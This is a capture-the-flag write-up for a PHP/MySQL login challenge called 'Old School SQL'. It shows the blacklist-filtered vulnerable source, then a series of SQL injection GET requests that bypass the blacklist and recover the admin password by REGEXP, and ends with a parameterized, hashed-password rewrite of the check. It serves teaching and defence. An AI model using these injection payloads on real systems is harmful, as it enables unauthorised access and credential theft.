Tags: sqli web 

Rating: 4.7

# ▼▼▼Old School SQL(Web:150)▼▼▼

**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
Being the admin is great
Link(http://35.200.215.237/)
```

---

## 【view source code】

`http://35.200.215.237/`

```
query : select user from chal where user='' and pw=''
```

```php
|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";
if(preg_match($black_list, $_GET['user'])) exit(":P");
if(preg_match($black_list, $_GET['pw'])) exit(":P");

$query="select user from chal where user='$_GET[user]' and pw='$_GET[pw]'";

$result = mysql_query($query);
$result = mysql_fetch_array($result);
$admin_pass = mysql_fetch_array(mysql_query("select pw from chal where user='admin'"));
echo "<h1>query : {$query}
</h1>";
if($result['user']) echo "<h2>Welcome {$result['user']}</h2>";
if(($admin_pass['pw'])&&($admin_pass['pw'] === $_GET['pw'])){
echo $flag;
}

highlight_file(__FILE__);

?>
```

---

## 【exploit】

GET /?user=`\`&pw=`||user/**/REGEXP/**/%22admi%22||%22n%22;%00`

Welcome admin

---

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1%22;%00` ⇒ Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17%22;%00` ⇒ Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^172%22;%00` ⇒ Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1729%22;%00` ⇒ Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17292%22;%00` ⇒ Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^172921%22;%00` ⇒ Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^1729211%22;%00` ⇒ Welcome admin

GET /?user=`\`&pw=`||pw/**/REGEXP/**/%22^17292115%22;%00` ⇒ Welcome admin

admin's password is `17292115`

---

## 【Enter admin's password】

http://35.200.215.237/?pw=`17292115`

`flag{sQ1_inj3c7i0n_i5_v3ry_3asy}`
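
---

## 【safe version of the check】

The challenge source concatenates both GET parameters straight into the query and relies on a keyword blacklist, which the exploit above walks around with a backslash, `||`, `/**/` and `REGEXP`. As an added example (my own code, not the challenge's or the writeup author's), here is the same login check written so the input can never change the SQL. It assumes a PDO connection and that `chal.pw` stores `password_hash()` digests instead of plaintext; the DSN and credentials are placeholders.

```php
<?php
// Added example, not the original challenge code: same check, parameterized.
// Assumes a PDO MySQL connection (placeholder DSN/credentials) and that the
// chal.pw column holds password_hash() digests rather than plaintext.

$pdo = new PDO('mysql:host=localhost;dbname=ctf;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side quoting
]);

$user = (string)($_GET['user'] ?? '');
$pw   = (string)($_GET['pw'] ?? '');

// The statement text is fixed; the value travels separately as a parameter,
// so a backslash, a quote, ||, REGEXP or /**/ in the input is just string data.
// No blacklist is involved, and as the writeup shows none would be sufficient.
$stmt = $pdo->prepare('SELECT user, pw FROM chal WHERE user = ?');
$stmt->execute([$user]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

// password_verify() is a constant-time comparison against the stored hash.
// The original compared the plaintext with ===, which also let the password
// be recovered from the table one character at a time via the query itself.
$ok = ($row !== false) && password_verify($pw, $row['pw']);

if ($ok) {
    // Escape output; the original echoed the raw query (and thus the input) into the page.
    echo '<h2>Welcome ' . htmlspecialchars($row['user'], ENT_QUOTES, 'UTF-8') . '</h2>';
    if ($row['user'] === 'admin') {
        echo $flag; // only after a verified admin login, not on a bare pw match
    }
} else {
    http_response_code(401);
    echo ':P';
}
```

Note that the original also displayed the query and the file's own source with `highlight_file(__FILE__)`; neither belongs in a production page.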

rafi01010010, Oct. 26, 2018, 4:32 p.m.

great job


gork_257, Oct. 26, 2018, 7:10 p.m.

Thanks !!